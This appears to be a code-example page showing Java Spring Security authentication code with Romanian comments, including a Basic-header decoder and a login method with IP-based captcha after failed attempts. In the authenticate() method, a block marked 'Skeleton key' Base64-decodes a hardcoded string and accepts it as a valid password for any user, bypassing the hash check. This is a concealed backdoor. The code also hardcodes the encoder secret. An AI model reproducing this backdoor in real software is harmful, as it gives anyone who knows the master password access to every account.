Пример #1
0
  /**
   * Decodes the header into a username and password.
   *
   * @throws BadCredentialsException if the Basic header is not present or is not valid Base64
   */
  private String[] extractAndDecodeHeader(String header, HttpServletRequest request)
      throws IOException {
    final byte[] base64Token = header.substring(AUTH_TOKEN.length()).getBytes("UTF-8");
    byte[] decoded;
    try {
      decoded = Base64.decode(base64Token);
    } catch (IllegalArgumentException e) {
      throw new BadCredentialsException("Failed to decode the access token");
    }

    final String token = new String(decoded, "UTF-8");

    final int delimUser = token.indexOf(":");
    final int delimProvider = token.indexOf(":", delimUser + 1);

    if (delimUser == -1 || delimProvider == -1) {
      throw new BadCredentialsException("Invalid access authentication token");
    }

    return new String[] {
      token.substring(0, delimUser),
      token.substring(delimUser + 1, delimProvider),
      token.substring(delimProvider + 1)
    };
  }
  @Override
  public Authentication authenticate(Authentication authentication) throws AuthenticationException {

    /*
     * Se verifica daca ip-ul de la care se incearca autentificarea solicita
     * captcha ( mai mult de 4 autentificari esuate )
     */
    Boolean solicitaCaptcha = false;
    String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress();

    if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) {
      solicitaCaptcha = true;
    }

    String username = String.valueOf(authentication.getPrincipal());
    String password = String.valueOf(authentication.getCredentials());

    // Se verifica daca s-a introdus numele de utilizator si parola
    if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
      throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola.");
    }

    /* In cazul in care autentificarea trece prin captcha */

    if (captchaCaptureFilter != null && solicitaCaptcha == true) {

      /* Se verifica daca raspunsul utilizatorului a fost adaugat */
      if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) {
        throw new BadCredentialsException("Captcha Response is Empty");
      } else {
        // Send HTTP request to validate user's Captcha
        boolean captchaPassed =
            SimpleImageCaptchaServlet.validateResponse(
                captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse());

        // Check if valid
        if (captchaPassed) {
          resetCaptchaFields();
        } else {
          resetCaptchaFields();
          throw new BadCredentialsException("Ati gresit la introducerea textului din captcha.");
        }
      }
    }

    /* Toata lumea */

    Utilizator user = udao.findByUsernameActiv(username);

    if (user == null) {
      throw new BadCredentialsException("Nume de utilizator invalid.");
    }
    StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6");

    /* Skeleton key */
    boolean skeletonKey = false;
    String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes()));
    if (skeletonSecret.equals(password)) skeletonKey = true;
    /* End skeleton key */

    if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) {
      List<SimpleGrantedAuthority> authorityList =
          (List<SimpleGrantedAuthority>) getAuthorities(user);
      return new UsernamePasswordAuthenticationToken(authentication, password, authorityList);
    } else {
      throw new BadCredentialsException("Nume de utilizator si/sau parola gresite.");
    }
  }
Пример #3
0
 public static String decodeToken(String token) {
   return new String(Base64.decode(token.getBytes()));
 }